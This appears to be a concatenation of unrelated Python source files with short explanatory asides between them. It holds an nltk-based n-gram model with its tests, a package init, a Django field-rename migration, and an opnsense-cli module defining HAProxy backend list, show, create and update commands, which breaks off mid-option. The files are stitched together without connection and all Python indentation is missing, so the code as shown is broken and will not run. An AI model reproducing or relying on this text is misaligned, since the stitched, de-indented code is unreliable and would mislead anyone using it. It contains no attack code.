def train(self, corpus_fp, vocab=None, encoding=None):
N = self.N
H = self.hyperparameters
models, counts = {}, {}
grams = {n: [] for n in range(1, N + 1)}
gg = {n: [] for n in range(1, N + 1)}
filter_punc, filter_stop = H["filter_punctuation"], H["filter_stopwords"]
n_words = 0
tokens = set()
with open(corpus_fp, "r", encoding=encoding) as text:
for line in text:
words = tokenize_words(line, filter_punc, filter_stop)
if vocab is not None:
words = vocab.filter(words, H["unk"])
if len(words) == 0:
continue
n_words += len(words)
tokens.update(words)
# calculate n, n-1, ... 1-grams
for n in range(1, N + 1):
grams[n].append(
nltk.ngrams(
words,
n,
pad_left=True,
pad_right=True,
left_pad_symbol="<bol>",
right_pad_symbol="<eol>",
)
)
gg[n].extend(
list(
nltk.ngrams(
words,
n,
pad_left=True,
pad_right=True,
left_pad_symbol="<bol>",
right_pad_symbol="<eol>",
)
)
)
for n in range(1, N + 1):
counts[n] = nltk.FreqDist(gg[n])
models[n] = nltk.lm.Lidstone(order=n, gamma=self.K)
models[n].fit(grams[n], tokens)
self.counts = counts
self._models = models
self.n_words = n_words
self.n_tokens = len(vocab) if vocab is not None else len(tokens)
def log_prob(self, words, N):
assert N in self.counts, "You do not have counts for {}-grams".format(N)
if N > len(words):
err = "Not enough words for a gram-size of {}: {}".format(N, len(words))
raise ValueError(err)
total_prob = 0
for ngram in nltk.ngrams(words, N):
total_prob += self._log_ngram_prob(ngram)
return total_prob
def _log_ngram_prob(self, ngram):
N = len(ngram)
return self._models[N].logscore(ngram[-1], ngram[:-1])
def test_mle():
N = np.random.randint(2, 5)
gold = MLEGold(N, unk=True, filter_stopwords=False, filter_punctuation=False)
mine = MLENGram(N, unk=True, filter_stopwords=False, filter_punctuation=False)
with tempfile.NamedTemporaryFile() as temp:
temp.write(bytes(" ".join(random_paragraph(1000)), encoding="utf-8-sig"))
gold.train(temp.name, encoding="utf-8-sig")
mine.train(temp.name, encoding="utf-8-sig")
for k in mine.counts[N].keys():
if k[0] == k[1] and k[0] in ("<bol>", "<eol>"):
continue
err_str = "{}, mine: {}, gold: {}"
assert mine.counts[N][k] == gold.counts[N][k], err_str.format(
k, mine.counts[N][k], gold.counts[N][k]
)
M = mine.log_prob(k, N)
G = gold.log_prob(k, N) / np.log2(np.e) # convert to log base e
np.testing.assert_allclose(M, G)
print("PASSED")
def test_additive():
K = np.random.rand()
N = np.random.randint(2, 5)
gold = AdditiveGold(
N, K, unk=True, filter_stopwords=False, filter_punctuation=False
)
mine = AdditiveNGram(
N, K, unk=True, filter_stopwords=False, filter_punctuation=False
)
with tempfile.NamedTemporaryFile() as temp:
temp.write(bytes(" ".join(random_paragraph(1000)), encoding="utf-8-sig"))
gold.train(temp.name, encoding="utf-8-sig")
mine.train(temp.name, encoding="utf-8-sig")
for k in mine.counts[N].keys():
if k[0] == k[1] and k[0] in ("<bol>", "<eol>"):
continue
err_str = "{}, mine: {}, gold: {}"
assert mine.counts[N][k] == gold.counts[N][k], err_str.format(
k, mine.counts[N][k], gold.counts[N][k]
)
M = mine.log_prob(k, N)
G = gold.log_prob(k, N) / np.log2(np.e) # convert to log base e
np.testing.assert_allclose(M, G)
print("PASSED")
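For reference, the quantity these tests compare — `nltk.lm.MLE.logscore` against `MLENGram.log_prob` — is, for a bigram and leaving the `<bol>`/`<eol>` padding aside, essentially log2(count(w1, w2) / count(w1)). A self-contained sketch of that maximum-likelihood estimate from raw counts (pure stdlib, no nltk; function name is my own):

```python
import math
from collections import Counter


def mle_bigram_log2prob(tokens, w1, w2):
    """log2 P(w2 | w1) under the maximum-likelihood estimate over a token list."""
    bigrams = Counter(zip(tokens, tokens[1:]))
    contexts = Counter(tokens[:-1])  # how often w1 occurs as a bigram context
    if contexts[w1] == 0 or bigrams[(w1, w2)] == 0:
        return float("-inf")  # unseen context or unseen bigram
    return math.log2(bigrams[(w1, w2)] / contexts[w1])


toks = ["a", "b", "a", "b", "a", "c"]
# "a" is followed by "b" twice and by "c" once -> P(b|a) = 2/3
print(mle_bigram_log2prob(toks, "a", "b"))  # log2(2/3) ≈ -0.585
```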
# File: sam/__init__.py (idostyle/SAM, Apache-2.0)

"""Init and import SAM."""
from .sam import SAM
# Generated by Django 3.1.3 on 2020-11-12 15:51
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("footballleagues", "0001_initial"),
]
operations = [
migrations.RenameField(
model_name="league",
old_name="createdby",
new_name="created_by",
),
migrations.RenameField(
model_name="league",
old_name="createddate",
new_name="created_date",
),
migrations.RenameField(
model_name="league",
old_name="numberofteams",
new_name="number_of_teams",
),
migrations.RenameField(
model_name="league",
old_name="updatedby",
new_name="updated_by",
),
migrations.RenameField(
model_name="league",
old_name="updateddate",
new_name="updated_date",
),
migrations.RenameField(
model_name="player",
old_name="createdby",
new_name="created_by",
),
migrations.RenameField(
model_name="player",
old_name="createddate",
new_name="created_date",
),
migrations.RenameField(
model_name="player",
old_name="updatedby",
new_name="updated_by",
),
migrations.RenameField(
model_name="player",
old_name="updateddate",
new_name="updated_date",
),
migrations.RenameField(
model_name="team",
old_name="createdby",
new_name="created_by",
),
migrations.RenameField(
model_name="team",
old_name="createddate",
new_name="created_date",
),
migrations.RenameField(
model_name="team",
old_name="updatedby",
new_name="updated_by",
),
migrations.RenameField(
model_name="team",
old_name="updateddate",
new_name="updated_date",
),
]
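All thirteen renames above follow one small mapping applied across the three models, plus one league-only field. A sketch showing how the operation list could be built programmatically (illustrative only; the real migration was auto-generated by `makemigrations`):

```python
# Common audit-field renames shared by league, player and team.
RENAMES = {
    "createdby": "created_by",
    "createddate": "created_date",
    "updatedby": "updated_by",
    "updateddate": "updated_date",
}
MODELS = ("league", "player", "team")

def build_rename_operations():
    # (model_name, old_name, new_name) triples; league has one extra field.
    ops = [("league", "numberofteams", "number_of_teams")]
    ops += [(model, old, new) for model in MODELS for old, new in RENAMES.items()]
    return ops
```

Each triple maps directly onto one `migrations.RenameField(model_name=..., old_name=..., new_name=...)` call.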
import click
from opnsense_cli.formatters.cli_output import CliOutputFormatter
from opnsense_cli.callbacks.click import \
formatter_from_formatter_name, bool_as_string, available_formats, int_as_string, tuple_to_csv, \
resolve_linked_names_to_uuids
from opnsense_cli.types.click_param_type.int_or_empty import INT_OR_EMPTY
from opnsense_cli.commands.plugin.haproxy import haproxy
from opnsense_cli.api.client import ApiClient
from opnsense_cli.api.plugin.haproxy import Settings, Service
from opnsense_cli.facades.commands.plugin.haproxy.backend import HaproxyBackendFacade
pass_api_client = click.make_pass_decorator(ApiClient)
pass_haproxy_backend_svc = click.make_pass_decorator(HaproxyBackendFacade)
@haproxy.group()
@pass_api_client
@click.pass_context
def backend(ctx, api_client: ApiClient, **kwargs):
"""
Health monitoring and load distribution for servers.
"""
settings_api = Settings(api_client)
service_api = Service(api_client)
ctx.obj = HaproxyBackendFacade(settings_api, service_api)
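The wiring above is the standard click pattern: the group callback constructs the facade once, stores it on `ctx.obj`, and `click.make_pass_decorator` injects it into each subcommand by type. A minimal self-contained sketch of the same pattern (toy names, not the opn-cli API):

```python
import click
from click.testing import CliRunner

class GreeterFacade:
    """Stand-in for a service facade such as HaproxyBackendFacade."""
    def greet(self, name):
        return f"hello {name}"

# Subcommands decorated with this receive the GreeterFacade from the context.
pass_greeter = click.make_pass_decorator(GreeterFacade)

@click.group()
@click.pass_context
def cli(ctx):
    # The group builds the service object once and stores it on the context.
    ctx.obj = GreeterFacade()

@cli.command()
@click.argument("name")
@pass_greeter
def greet(greeter: GreeterFacade, name):
    click.echo(greeter.greet(name))

result = CliRunner().invoke(cli, ["greet", "world"])
```

`make_pass_decorator` walks the context chain looking for an object of the given type, so deeply nested command groups can all share the one facade created at the top.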
@backend.command()
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="table",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c "") to show all columns',
default=(
"uuid,enabled,name,description,mode,algorithm,Servers,"
"healthCheckEnabled,Healthcheck,persistence,stickiness_pattern"
)
)
@pass_haproxy_backend_svc
def list(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Show all backend
"""
result = haproxy_backend_svc.list_backends()
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@backend.command()
@click.argument('uuid')
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="table",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c "") to show all columns',
default=(
"enabled,name,description,mode,algorithm,random_draws,proxyProtocol,linkedServers,"
"linkedResolver,resolverOpts,resolvePrefer,source,"
"healthCheckEnabled,healthCheck,healthCheckLogStatus,checkInterval,checkDownInterval,"
"healthCheckFall,healthCheckRise,linkedMailer,http2Enabled,http2Enabled_nontls,"
"ba_advertised_protocols,persistence,persistence_cookiemode,persistence_cookiename,"
"persistence_stripquotes,stickiness_pattern,stickiness_dataTypes,stickiness_expire,"
"stickiness_size,stickiness_cookiename,stickiness_cookielength,stickiness_connRatePeriod,"
"stickiness_sessRatePeriod,stickiness_httpReqRatePeriod,stickiness_httpErrRatePeriod,"
"stickiness_bytesInRatePeriod,stickiness_bytesOutRatePeriod,basicAuthEnabled,basicAuthUsers,"
"basicAuthGroups,tuning_timeoutConnect,tuning_timeoutCheck,tuning_timeoutServer,"
"tuning_retries,customOptions,tuning_defaultserver,tuning_noport,tuning_httpreuse,tuning_caching,"
"linkedActions,linkedErrorfiles"
),
show_default=True,
)
@pass_haproxy_backend_svc
def show(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Show details for backend
"""
result = haproxy_backend_svc.show_backend(kwargs['uuid'])
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@backend.command()
@click.argument('name')
@click.option(
'--enabled/--no-enabled',
help='Enable or disable this backend.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=True,
)
@click.option(
'--description',
help='Description for this backend pool.',
show_default=True,
default=None,
required=False,
)
@click.option(
'--mode',
help='Set the running mode or protocol of the backend pool.',
type=click.Choice(['http', 'tcp']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='http',
required=True,
)
@click.option(
'--algorithm',
help='Define the load balancing algorithm to be used in a backend pool.',
type=click.Choice(['source', 'roundrobin', 'static-rr', 'leastconn', 'uri', 'random']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='source',
required=True,
)
@click.option(
'--random_draws',
help=(
'When using the Random Balancing Algorithm, this value indicates the number of draws '
'before selecting the least loaded of these servers.'
),
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=2,
required=True,
)
@click.option(
'--proxyProtocol',
help='Enforces use of the PROXY protocol over any connection established to the configured servers.',
type=click.Choice(['', 'v1', 'v2']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None,
required=False,
)
@click.option(
'--linkedServers',
help='Add servers to this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--linkedResolver',
help='Select the custom resolver configuration that should be used for all servers in this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--resolverOpts',
help='Add resolver options.',
type=click.Choice(['', 'allow-dup-ip', 'ignore-weight', 'prevent-dup-ip']),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=[],
required=False,
)
@click.option(
'--resolvePrefer',
help=(
'When DNS resolution is enabled for a server and multiple IP addresses from different families are returned, '
'HAProxy will prefer using an IP address from the selected family.'
),
type=click.Choice(['', 'ipv4', 'ipv6']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None,
required=False,
)
@click.option(
'--source',
help='Sets the source address which will be used when connecting to the server(s).',
show_default=True,
default=None,
required=False,
)
@click.option(
'--healthCheckEnabled/--no-healthCheckEnabled',
help='Enable or disable health checking.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=True,
)
@click.option(
'--healthCheck',
help='Select health check for servers in this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--healthCheckLogStatus/--no-healthCheckLogStatus',
help='Enable to log health check status updates.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--checkInterval',
help=(
'Sets the interval (in milliseconds) for running health checks on all configured servers. '
'This setting takes precedence over default values in health monitors and real servers.'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--checkDownInterval',
help=(
'Sets the interval (in milliseconds) for running health checks on a configured server when the server state '
'is DOWN. If it is not set HAProxy uses the check interval.'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--healthCheckFall',
help='The number of consecutive unsuccessful health checks before a server is considered as unavailable.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None,
required=False,
)
@click.option(
'--healthCheckRise',
help='The number of consecutive successful health checks before a server is considered as available.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None,
required=False,
)
@click.option(
'--linkedMailer',
help='Select an e-mail alert configuration. An e-mail is sent when the state of a server changes.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--http2Enabled/--no-http2Enabled',
help='Enable support for end-to-end HTTP/2 communication.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--http2Enabled_nontls/--no-http2Enabled_nontls',
help='Enable support for HTTP/2 even if TLS is not enabled.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--ba_advertised_protocols',
help=(
'When using the TLS ALPN extension, HAProxy advertises the specified protocol list as supported on top of ALPN.'
' TLS must be enabled.'
),
type=click.Choice(['', 'h2', 'http11', 'http10']),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=['h2', 'http11'],
required=False,
)
@click.option(
'--persistence',
help=(
'Choose how HAProxy should track user-to-server mappings. '
'Stick-table persistence works with all protocols, but is broken in multi-process and multithreaded modes. '
'Cookie-based persistence only works with HTTP/HTTPS protocols.'
),
type=click.Choice(['', 'sticktable', 'cookie']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='sticktable',
required=False,
)
@click.option(
'--persistence_cookiemode',
help=(
'Usually it is better to reuse an existing cookie. '
'In this case HAProxy prefixes the cookie with the required information.'
),
type=click.Choice(['piggyback', 'new']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='piggyback',
required=True,
)
@click.option(
'--persistence_cookiename',
help='Cookie name to use for persistence.',
show_default=True,
default='SRVCOOKIE',
required=False,
)
@click.option(
'--persistence_stripquotes/--no-persistence_stripquotes',
help='Enable to automatically strip quotes from the cookie value.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=True,
)
@click.option(
'--stickiness_pattern',
help='Choose a request pattern to associate a user to a server.',
type=click.Choice(['', 'sourceipv4', 'sourceipv6', 'cookievalue', 'rdpcookie']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='sourceipv4',
required=False,
)
@click.option(
'--stickiness_dataTypes',
help=(
'This is used to store additional information in the stick-table. '
'It may be used by ACLs in order to control various criteria related to the activity of the client matching '
'the stick-table. Note that this directly impacts memory usage.'
),
type=click.Choice(
[
'', 'conn_cnt', 'conn_cur', 'conn_rate', 'sess_cnt', 'sess_rate', 'http_req_cnt', 'http_req_rate',
'http_err_cnt', 'http_err_rate', 'bytes_in_cnt', 'bytes_in_rate', 'bytes_out_cnt', 'bytes_out_rate'
]
),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=[],
required=False,
)
@click.option(
'--stickiness_expire',
help=(
'This configures the maximum duration of an entry in the stick-table since it was last created, refreshed '
'or matched. The maximum duration is slightly above 24 days. Enter a number followed by one of the supported '
'suffixes "d" (days), "h" (hours), "m" (minutes), "s" (seconds), "ms" (milliseconds).'
),
show_default=True,
default='30m',
required=True,
)
@click.option(
'--stickiness_size',
help=(
'This configures the maximum number of entries that can fit in the table. '
'This value directly impacts memory usage. '
'Count approximately 50 bytes per entry, plus the size of a string if any. '
'Enter a number followed by one of the supported suffixes "k", "m", "g".'
),
show_default=True,
default='50k',
required=True,
)
@click.option(
'--stickiness_cookiename',
help='Cookie name to use for stick table.',
show_default=True,
default=None,
required=False,
)
@click.option(
'--stickiness_cookielength',
help='The maximum number of characters that will be stored in the stick table.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None,
required=False,
)
@click.option(
'--stickiness_connRatePeriod',
help=(
'The length of the period over which the average is measured. It reports the average incoming connection rate '
'over that period, in connections per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='10s',
required=False,
)
@click.option(
'--stickiness_sessRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average incoming session rate over that period, '
'in sessions per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='10s',
required=False,
)
@click.option(
'--stickiness_httpReqRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average HTTP request rate over that period, in requests per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='10s',
required=False,
)
@click.option(
'--stickiness_httpErrRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average HTTP request error rate over that period, in requests per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='10s',
required=False,
)
@click.option(
'--stickiness_bytesInRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average incoming bytes rate over that period, in bytes per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='1m',
required=False,
)
@click.option(
'--stickiness_bytesOutRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average outgoing bytes rate over that period, in bytes per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='1m',
required=False,
)
@click.option(
'--basicAuthEnabled/--no-basicAuthEnabled',
help='Enable HTTP basic authentication.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--basicAuthUsers',
help='Basic auth users.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--basicAuthGroups',
help='Basic auth groups.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_timeoutConnect',
help=(
'Set the maximum time to wait for a connection attempt to a server to succeed. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_timeoutCheck',
help=(
'Sets an additional read timeout for running health checks on a server. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_timeoutServer',
help=(
'Set the maximum inactivity time on the server side. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_retries',
help=(
'Set the number of retries to perform on a server after a connection failure.'
),
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None,
required=False,
)
@click.option(
'--customOptions',
help=(
'These lines will be added to the HAProxy backend configuration.'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_defaultserver',
help=(
'Default option for all server entries.'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_noport/--no-tuning_noport',
help=(
"Don't set a port on the server; the same port the frontend receives on is used instead. "
"If health checking is enabled, a check port must be configured on the server."
),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=True,
)
@click.option(
'--tuning_httpreuse',
help=(
'Declare how idle HTTP connections may be shared between requests.'
),
type=click.Choice(['', 'never', 'safe', 'aggressive', 'always']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='safe',
required=False,
)
@click.option(
'--tuning_caching/--no-tuning_caching',
help=(
'Enable caching of responses from this backend. '
'The HAProxy cache must be enabled under Settings before this will have any effect.'
),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--linkedActions',
help='Choose rules to be included in this backend pool.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--linkedErrorfiles',
help='Choose error messages to be included in this backend pool.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="plain",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c "") to show all columns',
default="result,validations",
show_default=True,
)
@pass_haproxy_backend_svc
def create(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Create a new backend
"""
json_payload = {
'backend': {
"enabled": kwargs['enabled'],
"name": kwargs['name'],
"description": kwargs['description'],
"mode": kwargs['mode'],
"algorithm": kwargs['algorithm'],
"random_draws": kwargs['random_draws'],
"proxyProtocol": kwargs['proxyprotocol'],
"linkedServers": kwargs['linkedservers'],
"linkedResolver": kwargs['linkedresolver'],
"resolverOpts": kwargs['resolveropts'],
"resolvePrefer": kwargs['resolveprefer'],
"source": kwargs['source'],
"healthCheckEnabled": kwargs['healthcheckenabled'],
"healthCheck": kwargs['healthcheck'],
"healthCheckLogStatus": kwargs['healthchecklogstatus'],
"checkInterval": kwargs['checkinterval'],
"checkDownInterval": kwargs['checkdowninterval'],
"healthCheckFall": kwargs['healthcheckfall'],
"healthCheckRise": kwargs['healthcheckrise'],
"linkedMailer": kwargs['linkedmailer'],
"http2Enabled": kwargs['http2enabled'],
"http2Enabled_nontls": kwargs['http2enabled_nontls'],
"ba_advertised_protocols": kwargs['ba_advertised_protocols'],
"persistence": kwargs['persistence'],
"persistence_cookiemode": kwargs['persistence_cookiemode'],
"persistence_cookiename": kwargs['persistence_cookiename'],
"persistence_stripquotes": kwargs['persistence_stripquotes'],
"stickiness_pattern": kwargs['stickiness_pattern'],
"stickiness_dataTypes": kwargs['stickiness_datatypes'],
"stickiness_expire": kwargs['stickiness_expire'],
"stickiness_size": kwargs['stickiness_size'],
"stickiness_cookiename": kwargs['stickiness_cookiename'],
"stickiness_cookielength": kwargs['stickiness_cookielength'],
"stickiness_connRatePeriod": kwargs['stickiness_connrateperiod'],
"stickiness_sessRatePeriod": kwargs['stickiness_sessrateperiod'],
"stickiness_httpReqRatePeriod": kwargs['stickiness_httpreqrateperiod'],
"stickiness_httpErrRatePeriod": kwargs['stickiness_httperrrateperiod'],
"stickiness_bytesInRatePeriod": kwargs['stickiness_bytesinrateperiod'],
"stickiness_bytesOutRatePeriod": kwargs['stickiness_bytesoutrateperiod'],
"basicAuthEnabled": kwargs['basicauthenabled'],
"basicAuthUsers": kwargs['basicauthusers'],
"basicAuthGroups": kwargs['basicauthgroups'],
"tuning_timeoutConnect": kwargs['tuning_timeoutconnect'],
"tuning_timeoutCheck": kwargs['tuning_timeoutcheck'],
"tuning_timeoutServer": kwargs['tuning_timeoutserver'],
"tuning_retries": kwargs['tuning_retries'],
"customOptions": kwargs['customoptions'],
"tuning_defaultserver": kwargs['tuning_defaultserver'],
"tuning_noport": kwargs['tuning_noport'],
"tuning_httpreuse": kwargs['tuning_httpreuse'],
"tuning_caching": kwargs['tuning_caching'],
"linkedActions": kwargs['linkedactions'],
"linkedErrorfiles": kwargs['linkederrorfiles'],
}
}
result = haproxy_backend_svc.create_backend(json_payload)
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
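The option callbacks used throughout this module (`bool_as_string`, `int_as_string`, `tuple_to_csv`) normalize click's native values into the string form the OPNsense API payload expects. A hypothetical sketch of what two such callbacks might look like (labels and behavior are assumptions for illustration, not the actual opn-cli implementations):

```python
def bool_as_string(ctx, param, value):
    # Hypothetical: map a click boolean flag to the "1"/"0" strings an API may expect.
    if value is None:
        return None
    return "1" if value else "0"

def tuple_to_csv(ctx, param, value):
    # Hypothetical: click collects multiple=True options as a tuple; join them as CSV.
    if value is None:
        return None
    if isinstance(value, tuple):
        return ",".join(value)
    return value
```

Because click invokes the callback with `(ctx, param, value)` after type conversion, the command function only ever sees the already-normalized string, which keeps the payload-building code in `create` flat.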
@backend.command()
@click.argument('uuid')
@click.option(
'--enabled/--no-enabled',
help='Enable or disable this backend.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--name',
help='The name of the backend pool.',
show_default=True,
default=None
)
@click.option(
'--description',
help='Description for this backend pool.',
show_default=True,
default=None
)
@click.option(
'--mode',
help='Set the running mode or protocol of the backend pool.',
type=click.Choice(['http', 'tcp']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--algorithm',
help='Define the load balancing algorithm to be used in a backend pool.',
type=click.Choice(['source', 'roundrobin', 'static-rr', 'leastconn', 'uri', 'random']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--random_draws',
help=(
'When using the Random Balancing Algorithm, this value indicates the number of draws '
'before selecting the least loaded of these servers.'
),
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--proxyProtocol',
help='Enforces use of the PROXY protocol over any connection established to the configured servers.',
type=click.Choice(['', 'v1', 'v2']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--linkedServers',
help='Add servers to this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--linkedResolver',
help='Select the custom resolver configuration that should be used for all servers in this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--resolverOpts',
help='Add resolver options.',
type=click.Choice(['', 'allow-dup-ip', 'ignore-weight', 'prevent-dup-ip']),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--resolvePrefer',
help=(
'When DNS resolution is enabled for a server and multiple IP addresses from different families are returned, '
'HAProxy will prefer using an IP address from the selected family.'
),
type=click.Choice(['', 'ipv4', 'ipv6']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--source',
help='Sets the source address which will be used when connecting to the server(s).',
show_default=True,
default=None
)
@click.option(
'--healthCheckEnabled/--no-healthCheckEnabled',
help='Enable or disable health checking.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--healthCheck',
help='Select health check for servers in this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--healthCheckLogStatus/--no-healthCheckLogStatus',
help='Enable to log health check status updates.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--checkInterval',
help=(
'Sets the interval (in milliseconds) for running health checks on all configured servers. '
'This setting takes precedence over default values in health monitors and real servers.'
),
show_default=True,
default=None
)
@click.option(
'--checkDownInterval',
help=(
'Sets the interval (in milliseconds) for running health checks on a configured server when the server state '
'is DOWN. If it is not set HAProxy uses the check interval.'
),
show_default=True,
default=None
)
@click.option(
'--healthCheckFall',
help='The number of consecutive unsuccessful health checks before a server is considered as unavailable.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--healthCheckRise',
help='The number of consecutive successful health checks before a server is considered as available.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--linkedMailer',
help='Select an e-mail alert configuration. An e-mail is sent when the state of a server changes.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--http2Enabled/--no-http2Enabled',
help='Enable support for end-to-end HTTP/2 communication.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--http2Enabled_nontls/--no-http2Enabled_nontls',
help='Enable support for HTTP/2 even if TLS is not enabled.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--ba_advertised_protocols',
help=(
'When using the TLS ALPN extension, HAProxy advertises the specified protocol list as supported on top of ALPN.'
' TLS must be enabled.'
),
type=click.Choice(['', 'h2', 'http11', 'http10']),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--persistence',
help=(
'Choose how HAProxy should track user-to-server mappings. '
'Stick-table persistence works with all protocols, but is broken in multi-process and multithreaded modes. '
'Cookie-based persistence only works with HTTP/HTTPS protocols.'
),
type=click.Choice(['', 'sticktable', 'cookie']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--persistence_cookiemode',
help=(
'Usually it is better to reuse an existing cookie. '
'In this case HAProxy prefixes the cookie with the required information.'
),
type=click.Choice(['piggyback', 'new']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--persistence_cookiename',
help='Cookie name to use for persistence.',
show_default=True,
default=None
)
@click.option(
'--persistence_stripquotes/--no-persistence_stripquotes',
help='Enable to automatically strip quotes from the cookie value.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--stickiness_pattern',
help='Choose a request pattern to associate a user to a server.',
type=click.Choice(['', 'sourceipv4', 'sourceipv6', 'cookievalue', 'rdpcookie']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--stickiness_dataTypes',
help=(
'This is used to store additional information in the stick-table. '
'It may be used by ACLs in order to control various criteria related to the activity of the client matching '
'the stick-table. Note that this directly impacts memory usage.'
),
type=click.Choice(
[
